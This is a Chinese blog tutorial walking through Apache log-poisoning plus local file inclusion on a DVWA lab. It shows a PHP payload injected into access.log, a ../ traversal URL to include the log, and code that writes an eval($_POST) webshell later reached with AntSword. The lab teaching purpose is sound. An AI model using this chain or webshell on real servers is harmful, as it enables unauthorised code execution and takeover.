首页 > 其他分享 >中间件日志包含绕过

中间件日志包含绕过

时间:2024-09-08 19:21:01浏览次数:3  
标签:文件 log .. 中间件 DVWA access 日志 绕过

当某个PHP文件只存在本地包含漏洞,不存在远程包含漏洞,而却无法上传正常文件(无上传功能),这就意味这有包含漏洞却不能拿来利用,这时攻击者就有可能会利用apache日志文件来入侵。

Apache服务器运行后会生成两个日志文件,这两个文件是access.log(访问日志)和error.log(错误日志),apache的日志文件记录下我们的操作,并且写到访问日志文件access.log之中。


以Apache为例,每次成功访问的记录都会记录在access.log下,访问失败的记录会记录在error.log下,如图所示:

但打开之后却是一片空白,按理说是有很多记录的

打开httpd.conf文件,找到CustomLog "logs/access.log" common,发现前面也没有#注释


换成phpstudy2018来做实验吧,还是一样的去掉#注释,重启phpstudy,重新打开DVWA靶场就发现有记录了,再去找到phpstudy2018的apache目录下的access.log文件

(注意:access.log的文件内容是可以删掉的,只不过Ctrl S保存会让你另存为的,这里我删了,方便后续查看内容)


下面就以DVWA靶场为例:(Low难度,phpstudy2018,win11开启phpstudy服务,win7虚拟机访问)

没想到出现了allow_url_include功能没开启的情况:

打开php.ini文件,找到allow_url_include项,修改状态为On,再重启phpstudy:


访问http://10.4.27.70/<?php phpinfo();?>

查看access.log可以看到被二次编码了:


用burp抓包还原:

查看access.log文件可以看到已经正常记录了:


接下来就要用文件包含了,在地址栏中输入:

http://10.4.27.70/DVWA/vulnerabilities/fi/?page=../../../../Apache/logs/access.log

为什么相对路径是这样呢?

当前目录是vulnerabilities/fi

第一级返回vulnerabilities目录

第二级返回DVWA目录

第三级返回WWW目录

第四级返回PHPTutorial目录

第五级返回phpstudy2018目录

第六级返回E盘

E:\phpstudy2018\PHPTutorial\WWW\DVWA\vulnerabilities\fi

E:\phpstudy2018\PHPTutorial\Apache\logs\access.log

所以是../../../../Apache/logs/access.log(要加多一个../才行)

可以看到成功访问


编写一句话木马并用burp抓包改包:

<?php $file=fopen('test1.php','w'); fputs($file,'<?php @eval($_POST[123]);?>');?>


在地址栏中输入:

http://10.4.27.70/DVWA/vulnerabilities/fi/?page=../../../../Apache/logs/access.log

用文件包含漏洞触发一句话木马后是可以看到在/DVWA/vulnerabilities/fi/目录下生成了个test1.php文件


用中国蚁剑连接:

http://10.4.27.70/DVWA/vulnerabilities/fi/test1.php

成功利用中间件日志包含漏洞!

标签:文件,log,..,中间件,DVWA,access,日志,绕过
From: https://blog.csdn.net/weixin_73049307/article/details/142031520

相关文章

  • k8s日志采集方案有哪些?大概步骤是啥?优缺点各是什么?
    在Kubernetes(K8s)中,日志采集是监控和故障排除的重要组成部分。以下是一些常见的日志采集方案及其步骤、优缺点。1.EFK堆栈(Elasticsearch,Fluentd,Kibana)步骤:部署Elasticsearch:用于存储和索引日志。部署Fluentd:作为日志收集器,收集来自KubernetesPod的日志并将其......
  • WGCLOUD使用实战配置 - 监测日志文件
    日志文件监测分两种方式,如下:1、第一种方式,直接指定日志文件的完整路径(可以是任意类型的文件,不一定是*.log),如:/usr/local/nginx/logs/access.log注意:监控的日志文件大小尽量不要超过200MB,不然可能会对agent性能有影响2、第二种方式,指定应用输出日志文件的目录比如我们要监控/ser......
  • 深入浅出:什么是日志技术?如何在项目中使用?
    深入浅出:什么是日志技术?如何在项目中使用?在软件开发中,日志技术就像一本记录系统“点点滴滴”的日记。系统运行时,它记录下关键事件——正常操作、异常情况都不会遗漏。日志不仅是开发人员分析系统行为的利器,还可以在项目出现问题时,帮助我们快速找到问题根源。那么,如何让系统“记日......
  • 中间件解析漏洞
    IIS解析漏洞IIS6.x在iis6.x中,.asp文件夹中的任意文件都会被当做asp文件去执行。在wwwroot下新建一个x.asp里边写入jpg文件这里到物理机访问文件IIS7.x这里得先修改php.ini配置文件里cgi.fix_pathinfo-1前边的分号去掉然后进入到网站里修改处理映射关系/请求限制/把映......
  • 日志服务管理
    系统日志管理sysklogd系统日志服务在CentOS5以及之前的发行版中,其采用的sysklogd服务来记录和管理系统日志的。sysklogd服务有两个模块:klogd:用于记录linuxkernel相关的日志syslogd:用于记录用户空间应用日志rsyslog系统日志服务RSYSLOGistherocket-fa......
  • 第十四讲:答疑文章(一):日志和索引相关问题
    第十四讲:答疑文章(一):日志和索引相关问题简概:​ 到目前为止,我已经收集了47个问题,很难通过今天这一篇文章全部展开。所以,我就先从中找了几个联系非常紧密的问题,串了起来,希望可以帮你解决关于日志和索引的一些疑惑。而其他问题,我们就留着后面慢慢展开吧。​ 我在第2篇文章《日......
  • Linux日志搜索 grep
    ##--且的关系--##先过滤第一步,然后基于第一步再过滤第二步,且的关系。catmyLogFile.log|grep"6dc7e0a484d5a7cc"|grep"369698634">>myLogFileGps-240816.log##--或的关系--##搜索结果为空catmyLogFile.log|grep"6dc7e0a484d5a7cc|369698634">>my......
  • 命令执行绕过
    命令执行绕过前言:仅提供一些绕过思路,对于较为敏感的命令基本已经失效了1、多空一格2、^混淆certutil-url^cache3、拷贝文件名copyC:\Windows\System32\certutil.exexx.exe之前绕过火绒添加用户案例copyc:\windows\system32\net1.exed:\update.exed:\update.exeus......
  • 远程下载上传命令(绕过大小限制)
    远程下载上传命令(绕过大小限制)python起http服务python3-mhttp.server5003python2-mSimpleHTTPServer5003上传时遇到限制上传大小时:编码base64:certutil-encodeyb.exe1.txt可以把1.txt拆成三个txt,分块上传后,再使用copyc:\*txtc:\123.txt//把c盘根目录下......
  • 我司使用了两年的高效日志打印工具,非常牛逼!
    为了更方便地排查问题,电商交易系统的日志中需要记录用户id和订单id等字段。然而,每次打印日志都需要手动设置用户id,这一过程非常繁琐,需要想个办法优化下。log.warn("user:{},orderId:{}订单提单成功",userId,orderId);log.warn("user:{},orderId:{}订单支付成功",userId,orde......